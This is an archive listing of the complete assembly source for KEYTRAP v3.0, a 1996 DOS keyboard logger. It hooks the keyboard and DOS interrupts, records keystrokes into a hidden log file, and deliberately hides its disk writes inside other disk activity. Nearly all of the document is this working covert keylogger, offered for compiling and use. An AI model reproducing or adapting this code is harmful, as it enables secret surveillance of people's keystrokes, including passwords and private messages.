Underground

home *** CD-ROM | disk | FTP | other *** search

/ Underground / Underground CD1.iso / hack / progsy / inne / keytrap3 / keytrap3.asm < prev next >

Wrap

Assembly Source File | 1996-02-19 | 12.2 KB | 312 lines

; ; KEYTRAP v3.0 - Keyboard Key Logger ; By dcypher (dcypher@mhv.net) ; ; http://frosted.mhv.net/keytrap.html ; ; ; Usage: KEYTRAP (options MUST be installed before you compile) ; ; This version of Keytrap will constantly log keys. ; It will NOT stop after a certian amount of keys. ; The only 2 options that you must install before ; compiling this source are the complete dir\logfile, ; and the size limit of the log file. The size limit ; must be in HEX format using 2 words. ; ; The default options are "C:\KLOG" as the complete ; directory and log file name, and the default log ; file size limit is set to 2 megs (x1E8480 - HEX). ; ; The size of the log file is ONLY checked when the ; program first installs. If the size exceeds the limit ; you specify here, the log file is deleted and a new ; one will be created (hidden). ; ; WARNING! - Options MUST be installed before compiling. ; ;------------------------------------------------ ; .286 ; 286 or better .model small ; .code ; org 100h ; ; begin: jmp install ; ; ;================================================ ; db ' dcypher@mhv.net / keytrap v3.0 ' ; ; buf db 401 dup (0) ; 400 byte buffer bufptr dw 0 ; +1 for luck ; hide db 0 ; save int21 function call handle dw 0 ; logfile handle control db 0 ; control which INT to use must_write db 0 ; must-write flag using_21 db 0 ; already doing an int-21 ; old_9a_off dw 0 ; old_9a_seg dw 0 ; ; old_9b_off dw 0 ; old_9b_seg dw 0 ; ; old_21_off dw 0 ; old_21_seg dw 0 ; ; datasegm dw 0 ; save data-segment (here) ; ;------------------------------------------------ **** OPTIONS **** ; logfile db 'c:\klog',0 ; <dir\logfile> ; logH dw 0001Eh ; log file size logL dw 08480h ; log file size ; ;============================================================================== ; int_9A: pushf ; pusha ; push es ; push ds ; mov ds, datasegm ; we are here ; cmp control, 1 ; use this one ? je A91 ; call pkey ; process key (scancode) ; A91: pop ds ; pop es ; popa ; popf ; jmp dword ptr old_9a_off ; ; ;================================================ ; pkey: cmp bufptr, 400 ; buffer limit reached ? jae pk2 ; ; in al, 60h ; get scancode ; cmp al, 39h ; get downstroke and only ja pk2 ; as far as spacebar !! cmp al, 2Ah ; NO LOGGING of sc's > 39h je pk2 ; don't log shift cmp al, 36h ; (both right and left) je pk2 ; don't log shift ; push 0 ; pop es ; mov ah, byte ptr es:[417h] ; get shift status test ah, 43h ; test for both shift keys je pk1 ; and cap-lock active ; add al, 80h ; show shift or cap-lock pk1: mov di, bufptr ; in logfile mov buf[di], al ; place scancode in buffer inc di ; mov bufptr, di ; save buffer pointer mov must_write, 1 ; try to write buffer when ; in int 21 pk2: ret ; ; ;================================================ ; int_9B: pushf ; pusha ; push es ; push ds ; mov ds, datasegm ; we are here ; cmp control, 0 ; use this one ? je B91 ; (not really needed) call pkey ; process a key (scancode) ; B91: pop ds ; pop es ; popa ; popf ; jmp dword ptr old_9b_off ; ; ;============================================================================== ; int_21: pushf ; pusha ; push es ; push ds ; mov ds, datasegm ; here we are ; cmp ax, 0ffffh ; check if already installed je D21 ; ; cmp using_21, 1 ; might need to call an je C21 ; int-21 here so jump if mov using_21, 1 ; called from below mov hide, ah ; save function # for hideing ; call switch ; always control the int 9's ; cmp must_write, 1 ; need to write ? jne B21 ; cmp bufptr, 400 ; push a write when buffer jae A21 ; is full ; cmp hide, 3Fh ; disk read je A21 ; (hide buffer write) cmp hide, 40h ; disk write je A21 ; jmp B21 ; can't hide, try another time ; A21: call saveb ; write buffer ; B21: mov using_21, 0 ; no int-21 calls anymore C21: pop ds ; pop es ; popa ; popf ; jmp dword ptr old_21_off ; ;------------------------------------------------ D21: pop ds ; already installed ! pop es ; popa ; popf ; mov ax, 1 ; show installed iret ; ; ;============================================================================== ; switch: mov ax, 3509h ; int 21h ; cmp bx, offset int_9A ; everything ok with 9A ? jne sw1 ; check offset mov control, 0 ; show who has control ret ; ; sw1: cmp control, 1 ; 9B already in use ? je sw2 ; yes, don't do anything mov ax, 3509h ; int 21h ; mov old_9b_seg, es ; mov old_9b_off, bx ; mov ax, 2509h ; lea dx, int_9B ; int 21h ; use 9B instead of 9A ! mov control, 1 ; show who has control sw2: ret ; ; ;------------------------------------------------ ; saveb: mov ax, 3d01h ; lea dx, logfile ; int 21h ; open logfile, r/w jc probw ; mov handle, ax ; mov bx, ax ; mov ax, 4202h ; xor cx, cx ; xor dx, dx ; int 21h ; point to eof jc probw ; mov ah, 40h ; mov bx, handle ; mov cx, bufptr ; lea dx, buf ; int 21h ; write buffer jc probw ; mov ah, 3Eh ; mov bx, handle ; int 21h ; close logfile jc probw ; ;------------------------------------------------ ; mov must_write, 0 ; no need to write anymore mov bufptr, 0 ; buffer pointer back to 0 ; probw: ret ; try again another time ; (if problem writing) ;============================================================================== ;============================================================================== ; install:mov ax, 0ffffh ; int 21h ; already installed ? cmp ax, 1 ; je bye ; ; call clog ; check or create logfile ; mov ax, 3509h ; int 21h ; mov old_9a_off, bx ; save old int 9 mov old_9a_seg, es ; mov ah, 25h ; lea dx, int_9A ; int 21h ; hook only 9A to start ; mov ax, 3521h ; int 21h ; mov old_21_off, bx ; save old int 21 mov old_21_seg, es ; mov ah, 25h ; lea dx, int_21 ; int 21h ; point to new int 21 ; mov datasegm, ds ; save this datasegment area ; for later use in the ISR's mov bx, offset install ; mov ax, 3100h ; mov dx, bx ; mov cl, 04h ; shr dx, cl ; inc dx ; int 21h ; end / save above install ; bye: mov ah, 4Ch ; no installation int 21h ; just end ; ;============================================================================== ; clog: mov ax, 3D01h ; lea dx, logfile ; int 21h ; open the file jc clog3 ; mov handle, ax ; good open, save handle ; mov ax, 4202h ; mov bx, handle ; xor cx, cx ; xor dx, dx ; int 21h ; mov pointer to eof ; cmp logH, dx ; check size ja clog4 ; size ok cmp logH, dx ; je clog1 ; jmp clog2 ; must be below, not ok clog1: cmp logL, ax ; ja clog4 ; size ok ; clog2: mov ax, 4301h ; lea dx, logfile ; xor cx, cx ; int 21h ; change file mode mov ah, 41h ; lea dx, logfile ; int 21h ; delete file ; clog3: mov ah, 3Ch ; create new mov cx, 02h ; (hidden) lea dx, logfile ; int 21h ; mov handle, ax ; ; clog4: mov bx, handle ; close logfile handle mov ah, 3Eh ; int 21h ; ret ; ; ;============================================================================== end begin